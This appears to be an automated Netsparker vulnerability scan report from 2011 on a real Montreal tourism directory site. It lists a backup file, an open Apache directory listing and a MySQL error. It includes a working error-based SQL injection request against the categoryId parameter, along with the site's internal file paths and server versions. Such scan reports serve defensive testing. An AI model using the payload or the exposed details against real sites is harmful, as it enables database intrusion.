<br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/montreak/public_html/adodb/drivers/adodb-mysql.inc.php</b> on line <b>355</b><br />mysql error: [1040: Too many connections] in EXECUTE("SELECT * FROM category WHERE category_id = '166'")<pre align=left> &nbsp; <font face="Courier New,Courier">ADOConnection.Execute(SELECT * FROM category WHERE category_id = '166', false)</font><font color=#808080 size=-1> % line 1414, file: <a href="file://home/montreak/public_html/adodb/adodb.inc.php">adodb.inc.php</a></font><font face="Courier New,Courier">ADOConnection.GetRow(SELECT * FROM category WHERE category_id = '166')</font><font color=#808080 size=-1> % line 22, file: <a href="file://home/montreak/public_html/logic/CatalogDAO.class.php">CatalogDAO.class.php</a></font><font face="Courier New,Courier">CatalogDAO.getCategory(166)</font><font color=#808080 size=-1> % line 125, file: <a href="file://home/montreak/public_html/directory.php">directory.php</a></font></pre>
[Possible] Backup File Found

[Possible] Backup File Found

1 TOTAL
LOW
Netsparker identified a backup file on the web server.

Impact

Backup files can contain old or current versions of a file on the web server. This could include sensitive data such as password files or even the applications source code. This form of issue normally leads to further vulnerabilities or at worse sensitive information disclosure.

Remedy

Do not store backup files on production servers.
- /directory.php.bak

/directory.php.bak

http://www.montrealkiosk.com/directory.php.bak

Request

GET /directory.php.bak HTTP/1.1
Referer: http://www.montrealkiosk.com/directory.php.bak
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.montrealkiosk.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 13 Jan 2011 19:25:31 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.9
Transfer-Encoding: chunked
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><script type="text/javascript" src="show.js"></script><link href="main.css" rel="stylesheet" type="text/css"></head><body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onLoad="MM_preloadImages('img/bhome-on.gif','img/bsitemap-on.gif','img/bcontact-on.gif','img/bbookmark-on.gif','img/binfo-on.gif','img/btour-on.gif','img/bevents-on.gif','img/bhotel-on.gif','img/babout-on.gif');runSlideShow()"><table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr valign="top"> <td height="298" background="img/bg-menu.jpg" width="1600">&nbsp;</td> <td colspan="5" background="img/bg-menu.jpg"><table width="1000" border="0" cellspacing="0" cellpadding="0"> <tr> <td colspan="4"><table width="1000" border="0" cellspacing="0" cellpadding="0"> <tr valign="top"> <td width="551"><a href="/index.php"><img src="img/kingston.gif" alt="Kingston Kiosk - Your Guide to Kingston, Ontario. Book Ontario Hotel accommodations here... read up on our Kingston Tour Guide and Kingston events." width="551" height="90" border="0"></a></td> <td><a href="index.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image2','','img/bhome-on.gif',1)"><img src="img/bhome.gif" alt="Kingston, Ontario" name="Image2" width="41" height="30" border="0"></a><a href="sitemap.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image3','','img/bsitemap-on.gif',1)"><img src="img/bsitemap.gif" alt="Site Map" name="Image3" width="55" height="30" border="0"></a><a href="contact.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image4','','img/bcontact-on.gif',1)"><img src="img/bcontact.gif" alt="Kingston Kiosk Contact Info" name="Image4" width="74" height="30" border="0"></a><a href="javascript:addBookmark('Kingston Kiosk - Your Guide to Kingston, Ontario','http://www.kingstonkiosk.com')" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image5','','img/bbookmark-on.gif',1)"><img src="img/bbookmark.gif" alt="Bookmark Kingston Kiosk" name="Image5" width="96" height="30" border="0"></a></td> </tr> </table></td> </tr> <tr> <td width="120"><img src="img/menupic1.jpg" width="120" height="208"></td> <td width="204" valign="top"><table width="204" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="204" height="29"><a href="index.php#directory" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image7','','img/binfo-on.gif',1)"><img src="img/binfo.gif" alt="Kingston Business Directory" name="Image7" width="204" height="30" border="0"></a><a href="kingston-tour/index.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image10','','img/btour-on.gif',1)"><img src="img/btour.gif" alt="Kingston Tour Guide" name="Image10" width="204" height="29" border="0"></a><a href="kingston-events/index.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image11','','img/bevents-on.gif',1)"><img src="img/bevents.gif" alt="Kingston Events" name="Image11" width="204" height="29" border="0"></a><a href="ontario-hotels/kingston_ontario_canada_hotels.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image12','','img/bhotel-on.gif',1)"><img src="img/bhotel.gif" alt="Kingston Hotels" name="Image12" width="204" height="29" border="0"></a><a href="about.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image13','','img/babout-on.gif',1)"><img src="img/babout.gif" alt="About Kingston Kiosk" name="Image13" width="204" height="29" border="0"></a></td> </tr> <tr> <form name="form1" method="post" action=""> <td height="52"> <table width="204" height="52" border="0" cellpadding="0" cellspacing="0" background="img/buttonfiller.gif"> <tr> <td width="31">&nbsp;</td> <td width="173" height="29"> <!-- #BeginLibraryItem "/Library/quicklinks.lbi" --><select name="kingston" class="smalltext" OnChange="location.href=form1.kingston.options[selectedIndex].value"> <option selected>Quick Links <option value="http://www.kingstonkiosk.com/kingston-tour/index.php">Kingston Attractions <option value="http://www.kingstonkiosk.com/maps/index.php">Map of Kingston <option value="http://www.kingstonkiosk.com/weather.php">Kingston Weather <option value="http://www.kingstonkiosk.com/ontario-hotels/kingston_ontario_canada_hotels.php">Kingston Hotels <option value="http://www.kingstonkiosk.com/advertising.php">Advertising Information <option value="http://www.kingstonkiosk.com/contact.php">Contact Us</select><!-- #EndLibraryItem --></td> </tr> <tr> <td height="33" colspan="2" background="img/bg-button.gif">&nbsp;</td> </tr> </table></td> </form> </tr> </table></td> <td width="493"><img src="img/menupic2.jpg" alt="Kingston, Ontario - A Place to Awaken Your Senses" name="SlideShow" width="493" height="208" id="SlideShow"></td> <td><img src="img/menupic3.jpg" width="183" height="208"></td> </tr> </table></td> <td background="img/bg-menu.jpg" width="1600">&nbsp;</td> </tr> <tr> <td>&nbsp;</td> <td width="127" rowspan="3" valign="top" background="img/bg-left.gif"><img src="img/bg-left.gif" width="127" height="36"></td> <td width="187" rowspan="2" valign="top"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><img src="img/titlearrow.gif" width="22" height="22"></td> <td><img src="img/spc.gif" width="4" height="10"></td> <td><nobr class="maintitle">Kingston Directory</nobr></td> <td><img src="img/spc.gif" width="8" height="10"></td> <td width="1600" bgcolor="#CCCCCC">&nbsp;</td> </tr> <tr> <td colspan="5"><img src="img/spc.gif" width="100" height="3"></td> </tr> </table> <table width="100%" height="326" cellpadding="0" cellspacing="0"> <tr> <td bgcolor="#FFFFFF"> <div style="width:100%;height:326px;background-color:#FFFFFF; overflow:auto;"> <DIV style="MARGIN-TOP: 5px; MARGIN-LEFT: 5px"><B> </B> </DIV> <div style="margin-left:10px; margin-top:5px;"><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="directory.php?categoryId=166"> Arts & Entertainment </a> </div> <div style="margin-left:10px; margin-top:5px;"><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="directory.php?categoryId=167"> Business & Services </a> </div> <div style="margin-left:10px; margin-top:5px;"><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="directory.php?categoryId=168"> Education </a> </div> <div style="margin-left:10px; margin-top:5px;"><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="directory.php?categoryId=169"> Government </a> </div> <div style="margin-left:10px; margin-top:5px;"><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="directory.php?categoryId=173"> Health </a> </div> <div style="margin-left:10px; margin-top:5px;"><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="directory.php?categoryId=178"> News & Media </a> </div> <div style="margin-left:10px; margin-top:5px;"><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="directory.php?categoryId=179"> Restaurants </a> </div> <div style="margin-left:10px; margin-top:5px;"><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="directory.php?categoryId=180"> Shopping </a> </div> <div style="margin-left:10px; margin-top:5px;"><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="directory.php?categoryId=184"> Society & Culture </a> </div> <div style="margin-left:10px; margin-top:5px;"><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="directory.php?categoryId=181"> Sports & Recreation </a> </div> <div style="margin-left:10px; margin-top:5px;"><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="directory.php?categoryId=183"> Technology & Internet </a> </div> <div style="margin-left:10px; margin-top:5px;"><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="directory.php?categoryId=182"> Travel Guide </a> </div> <table width="100%" cellpadding="0" cellspacing="0"> <tr> <td><IMG height=8 width=4 src="/img/spc.gif"></td> </tr> <tr> <td height="4" background="img/line-horiz.gif"><IMG height=4 width=4 src="/img/spc.gif"></td> </tr> <tr> <td><IMG height=8 width=4 src="/img/spc.gif"></td> </tr> <tr> <td><IMG height=4 width=5 src="/img/spc.gif"><a href="index.php#directory">&gt;&gt; Back to Main Directory</a></td> </tr> <tr> <td>&nbsp;</td> </tr> </table> </div></td> </tr> </table> </td> <td width="18" rowspan="2" valign="top" background="img/live-vert.gif"><img src="img/live-vert.gif" width="18" height="36"></td> <td width="649" rowspan="2" valign="top"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><img src="img/titlearrow.gif" width="22" height="22"></td> <td><img src="img/spc.gif" width="4" height="10"></td> <td><nobr class="maintitle"><a href="index.php#directory">Kingston Business Directory</a> </nobr></td> <td><img src="img/spc.gif" width="8" height="10"></td> <td width="1600" bgcolor="#CCCCCC">&nbsp;</td> </tr> <tr> <td colspan="5"><img src="img/spc.gif" width="100" height="3"></td> </tr> </table> <table width="649" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="649"> <div class="contspc"> Welcome to the Kingston Business Directory. Whether you are a resident of Kingston or just visiting Kingston, you can use our business to directory to find what you need. If you would like to be included in our directory, <a href="advertising.php">find our about our advertising packages</a>.</div></td> </tr> </table> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td colspan="5"><img src="img/spc.gif" width="100" height="4"></td> </tr> <tr> <td><img src="img/titlearrow.gif" width="22" height="22"></td> <td><img src="img/spc.gif" width="4" height="10"></td> <td><NOBR class="maintitle"> </NOBR></td> <td><img src="img/spc.gif" width="8" height="10"></td> <td width="1600" bgcolor="#CCCCCC">&nbsp;</td> </tr> <tr> <td colspan="5"><img src="img/spc.gif" width="100" height="4"></td> </tr> </table> <TABLE cellSpacing=0 cellPadding=0 width="633" border=0> <TBODY> <TR align="left"> <FORM name=browse action=directory.php method=post> <INPUT type=hidden value=1 name=categoryId> <INPUT type=hidden value=1 name=page> <TD height=25 colSpan=5 bgcolor="#669900" class="whitebold"><strong>&nbsp;Premium Listings</strong></TD> </FORM> </TR> <TR> <TD vAlign=center width="33%"><IMG height=4 src="img/spc.gif" width=1></TD> <TD vAlign=top width=11><IMG height=4 src="img/spc.gif" width=1></TD> <TD vAlign=center width="33%"> <IMG height=4 src="img/spc.gif" width=1></TD> <TD vAlign=top width=11><IMG height=4 src="img/spc.gif" width=1></TD> <TD vAlign=center width="33%"> <IMG height=4 src="img/spc.gif" width=1></TD> </TR> <TR> <TD width="204" bgcolor='#E4E4E4'> <DIV class=contspc><a class="listing" href="spaandtravel-montrealspa.php"> Montreal Spas at SpaAndTravel.Com </a></DIV></TD> <TD vAlign=top width=11 background="img/live-vert-int.gif"><IMG height=20 src="img/live-vert-int.gif" width=11></TD> <TD width="204" bgcolor='#E4E4E4'> <DIV c..
Forbidden Resource

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /directory.php

/directory.php CONFIRMED

http://www.montrealkiosk.com/directory.php?name=http://netsparker.com/n&categoryId=188

Parameters

Parameter Type Value
name GET http://netsparker.com/n
categoryId GET 188

Request

GET /directory.php?name=http://netsparker.com/n&categoryId=188 HTTP/1.1
Referer: http://www.montrealkiosk.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.montrealkiosk.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Thu, 13 Jan 2011 19:21:07 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>403 Forbidden</TITLE></HEAD><BODY><H1>Forbidden</H1>You don't have permission to access /directory.phpon this server.<P><P>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.<HR><ADDRESS>Apache/1.3.42 Server at www.montrealkiosk.com Port 80</ADDRESS></BODY></HTML>
MySQL Database Identified

MySQL Database Identified

1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified that the target web site is using a MySQL Server. This is generally not a security issue and is reported here for information purposes.

Impact

This issue is reported as additional information only, there is no direct impact arising from this issue.
- /directory.php

/directory.php CONFIRMED

http://www.montrealkiosk.com/directory.php?categoryId=(select+1+and+row(1%2c1)%3e(select+count(*)%2c..

Request

GET /directory.php?categoryId=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Referer: http://www.montrealkiosk.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.montrealkiosk.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 13 Jan 2011 19:21:11 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.9
Transfer-Encoding: chunked
Content-Type: text/html


mysql error: [1062: Duplicate entry '_!@4dilemma:1' for key 1] in EXECUTE("SELECT * FROM listing, listing_to_premium_category WHERE listing.listing_id = listing_to_premium_category.listing_id AND listing_to_premium_category.category_id = (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) ORDER BY name")<pre align=left><font face="Courier New,Courier">ADOConnection.Execute(SELECT * FROM listing, listing_to_premium_category WHERE listing.listing_id = listing_to_premium_category.listing_id AND listing...)</font><font color=#808080 size=-1> % line 822, file: <a href="file://home/montreak/public_html/logic/CatalogDAO.class.php">CatalogDAO.class.php</a></font><font face="Courier New,Courier">CatalogDAO.getPremiumListings((select 1 and row(1,1)&gt;(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101..., Object:PagingHelper)</font><font color=#808080 size=-1> % line 217, file: <a href="file://home/montreak/public_html/directory.php">directory.php</a></font></pre>
Directory Listing (Apache)

Directory Listing (Apache)

1 TOTAL
INFORMATION
The web server responded with a list of files located in the target directory.

Impact

An attacker can see the files located in the directory and could potentially access files which disclose sensitive information.

Actions to Take

  1. See the remedy for solution.
  2. Configure the web server to disallow directory listing requests.
  3. This can also be caused the web server products that don't have latest security patches. Ensure that all of the patches have been applied.

Remedy

Change your httpd.conf file. A secure configuration for the requested directory should be similar to the following one:
<Directory /{YOUR DIRECTORY}>
	Options FollowSymLinks 
</Directory>
Remove the Indexes option from configuration. Do not forget to remove MultiViews as well.

External References

- /quebec-hotels/

/quebec-hotels/

http://www.montrealkiosk.com/quebec-hotels/

Request

GET /quebec-hotels/ HTTP/1.1
Referer: http://www.montrealkiosk.com/quebec-hotels/montreal_quebec_canada_hotels.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.montrealkiosk.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 13 Jan 2011 19:20:06 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Transfer-Encoding: chunked
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><HTML> <HEAD> <TITLE>Index of /quebec-hotels</TITLE> </HEAD> <BODY><H1>Index of /quebec-hotels</H1><PRE><IMG SRC="/icons/blank.gif" ALT=" "> <A HREF="?N=D">Name</A> <A HREF="?M=A">Last modified</A> <A HREF="?S=A">Size</A> <A HREF="?D=A">Description</A><HR><IMG SRC="/icons/back.gif" ALT="[DIR]"> <A HREF="/">Parent Directory</A> 26-Sep-2010 12:46 - <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="all_blainville_hotels.php">all_blainville_hotel..&gt;</A> 03-Nov-2006 20:20 1k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="all_boucherville_hotels.php">all_boucherville_hot..&gt;</A> 03-Nov-2006 20:20 1k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="all_dorval_hotels.php">all_dorval_hotels.php</A> 03-Nov-2006 20:20 1k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="all_laval_hotels.php">all_laval_hotels.php</A> 03-Nov-2006 20:20 2k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="all_longueuil_hotels.php">all_longueuil_hotels..&gt;</A> 03-Nov-2006 20:20 1k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="all_montreal_hotels.php">all_montreal_hotels.php</A> 03-Nov-2006 20:20 18k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="all_pointe_claire_hotels.php">all_pointe_claire_ho..&gt;</A> 03-Nov-2006 20:20 1k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="all_saint_jean_sur_richelieu_hotels.php">all_saint_jean_sur_r..&gt;</A> 03-Nov-2006 20:20 1k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="all_sainte_adele_hotels.php">all_sainte_adele_hot..&gt;</A> 03-Nov-2006 20:20 1k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="all_shawinigan_hotels.php">all_shawinigan_hotel..&gt;</A> 03-Nov-2006 20:20 1k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="all_sherbrooke_hotels.php">all_sherbrooke_hotel..&gt;</A> 03-Nov-2006 20:20 1k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="all_st-sauveur_hotels.php">all_st-sauveur_hotel..&gt;</A> 03-Nov-2006 20:20 1k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="all_trois_rivieres_hotels.php">all_trois_rivieres_h..&gt;</A> 03-Nov-2006 20:20 1k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="auberge_du_vieux-port_montreal.php">auberge_du_vieux-por..&gt;</A> 03-Nov-2006 20:20 20k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="best_western_chateauneuf_laval_laval.php">best_western_chateau..&gt;</A> 03-Nov-2006 20:20 40k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="best_western_europa-downtown_montreal.php">best_western_europa-..&gt;</A> 03-Nov-2006 20:20 47k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="best_western_montreal_airport_hotel_dorval.php">best_western_montrea..&gt;</A> 03-Nov-2006 20:20 29k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="best_western_ville-marie_hotel_&amp;_suites_montreal.php">best_western_ville-m..&gt;</A> 03-Nov-2006 20:20 46k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="blainville_quebec_canada_hotels.php">blainville_quebec_ca..&gt;</A> 03-Nov-2006 20:20 4k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="boucherville_quebec_canada_hotels.php">boucherville_quebec_..&gt;</A> 03-Nov-2006 20:20 5k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="chateau_versailles_hotel_montreal.php">chateau_versailles_h..&gt;</A> 20-Sep-2010 13:53 20k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="clarion_hotel_&amp;_suites_downtown_montreal.php">clarion_hotel_&amp;_suit..&gt;</A> 03-Nov-2006 20:20 20k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="comfort_inn_&amp;_suites_shawinigan.php">comfort_inn_&amp;_suites..&gt;</A> 03-Nov-2006 20:20 16k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="comfort_inn_aroport_dorval.php">comfort_inn_aroport_..&gt;</A> 03-Nov-2006 20:20 11k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="comfort_inn_laval_laval.php">comfort_inn_laval_la..&gt;</A> 03-Nov-2006 20:20 8k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="comfort_inn_south_shore_boucherville.php">comfort_inn_south_sh..&gt;</A> 03-Nov-2006 20:20 16k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="comfort_inn_trois_rivieres_trois_rivieres.php">comfort_inn_trois_ri..&gt;</A> 03-Nov-2006 20:20 14k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="comfort_inn_w._island_pointe_claire.php">comfort_inn_w._islan..&gt;</A> 03-Nov-2006 20:20 21k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="comfort_suites_downtown_montreal.php">comfort_suites_downt..&gt;</A> 03-Nov-2006 20:20 17k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="courtyard_by_marriott_montreal_downtown_montreal.php">courtyard_by_marriot..&gt;</A> 03-Nov-2006 20:20 14k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="days_inn_montreal_downtown_montreal.php">days_inn_montreal_do..&gt;</A> 03-Nov-2006 20:20 22k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="delta_centre_ville_montreal.php">delta_centre_ville_m..&gt;</A> 03-Nov-2006 20:20 19k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="delta_montreal_montreal.php">delta_montreal_montr..&gt;</A> 03-Nov-2006 20:20 12k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="delta_sherbrooke_sherbrooke.php">delta_sherbrooke_she..&gt;</A> 03-Nov-2006 20:20 13k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="delta_trois-rivieres_trois_rivieres.php">delta_trois-rivieres..&gt;</A> 03-Nov-2006 20:20 13k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="dorval_quebec_canada_hotels.php">dorval_quebec_canada..&gt;</A> 03-Nov-2006 20:20 9k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="econo_lodge_centre_ville_montreal.php">econo_lodge_centre_v..&gt;</A> 03-Nov-2006 20:20 14k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="econo_lodge_laval_laval.php">econo_lodge_laval_la..&gt;</A> 03-Nov-2006 20:20 16k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="error_log">error_log</A> 22-Aug-2007 20:17 8k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="europeenne_hotel_montreal.php">europeenne_hotel_mon..&gt;</A> 03-Nov-2006 20:20 14k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="fairmont_the_queen_elizabeth_montreal.php">fairmont_the_queen_e..&gt;</A> 03-Nov-2006 20:20 18k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="four_points_by_sheraton_dorval_montreal.php">four_points_by_shera..&gt;</A> 03-Nov-2006 20:20 16k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="four_points_by_sheraton_montreal_centre-ville_montreal.php">four_points_by_shera..&gt;</A> 03-Nov-2006 20:20 18k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="gouverneur_auberge_shawinigan_shawinigan.php">gouverneur_auberge_s..&gt;</A> 03-Nov-2006 20:20 22k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="gouverneur_ile_charron_longueuil.php">gouverneur_ile_charr..&gt;</A> 03-Nov-2006 20:20 20k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="gouverneur_place_dupuis_montreal_montreal.php">gouverneur_place_dup..&gt;</A> 03-Nov-2006 20:20 23k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="gouverneur_relais_saint_jean_sur_richelieu_saint_jean_sur_richelieu.php">gouverneur_relais_sa..&gt;</A> 03-Nov-2006 20:20 17k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="gouverneur_trois-rivieres_trois_rivieres.php">gouverneur_trois-riv..&gt;</A> 03-Nov-2006 20:20 18k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="holiday_inn_montreal,_quebec-airport_montreal.php">holiday_inn_montreal..&gt;</A> 03-Nov-2006 20:20 19k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="holiday_inn_montreal-midtown,_qc_montreal.php">holiday_inn_montreal..&gt;</A> 03-Nov-2006 20:20 19k <IMG SRC="/icons/folder.gif" ALT="[DIR]"> <A HREF="holiday_inn_montreal/">holiday_inn_montreal/</A> 03-Sep-2007 19:04 - <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="holiday_inn_montreal_aeroport_ouest,_qc_pointe_claire.php">holiday_inn_montreal..&gt;</A> 03-Nov-2006 20:20 19k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="holiday_inn_select_montreal-ctr_vle-dwtn_conv_ctr_montreal.php">holiday_inn_select_m..&gt;</A> 03-Nov-2006 20:20 18k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="hotel_auberge_universel_montreal_montreal.php">hotel_auberge_univer..&gt;</A> 03-Nov-2006 20:20 23k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="hotel_bonaparte_montreal.php">hotel_bonaparte_mont..&gt;</A> 03-Nov-2006 20:20 25k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="hotel_gault_montreal.php">hotel_gault_montreal..&gt;</A> 03-Nov-2006 20:20 22k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="hotel_inter-continental_montreal_montreal.php">hotel_inter-continen..&gt;</A> 03-Nov-2006 20:20 26k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="hotel_le_germain_montreal.php">hotel_le_germain_mon..&gt;</A> 03-Nov-2006 20:20 25k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="hotel_mont-gabriel_sainte_adele.php">hotel_mont-gabriel_s..&gt;</A> 03-Nov-2006 20:20 23k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="hotel_mortagne_boucherville.php">hotel_mortagne_bouch..&gt;</A> 03-Nov-2006 20:20 20k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="hotel_omni_mont-royal_montreal.php">hotel_omni_mont-roya..&gt;</A> 03-Nov-2006 20:20 29k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="hotel_quartier_latin_montreal_montreal.php">hotel_quartier_latin..&gt;</A> 03-Nov-2006 20:20 20k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="hotel_ruby_foo_s_montreal.php">hotel_ruby_foo_s_mon..&gt;</A> 03-Nov-2006 20:20 21k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="hotel_st._paul_montreal.php">hotel_st._paul_montr..&gt;</A> 03-Nov-2006 20:20 21k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A HREF="hotel_wandlyn_montreal.php">hotel_wandlyn_montre..&gt;</A> 03-Nov-2006 20:20 18k <IMG SRC="/icons/unknown.gif" ALT="[ ]"> <A 